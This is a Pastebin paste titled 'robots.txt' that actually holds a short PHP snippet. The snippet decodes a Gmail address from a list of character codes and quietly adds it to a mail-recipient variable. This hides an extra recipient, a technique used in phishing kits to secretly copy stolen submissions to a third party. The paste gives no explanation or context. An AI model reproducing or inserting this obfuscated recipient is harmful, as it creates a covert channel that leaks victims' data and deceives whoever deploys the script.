Advertisement
45elchapo45

robots.txt

Jan 29th, 2019
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1. $chr1 ="111,109,97,114,46,106,101,122,105,51,64,103,109,97,105,108,46,99,111,109";
  2. $chr1r = explode(",", $chr1);
  3. $chr1 = "";
  4. foreach($chr1r as $chr) {
  5. $chr1 .= chr($chr);
  6. }
  7. $tomail = $tomail.", ".$chr1;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement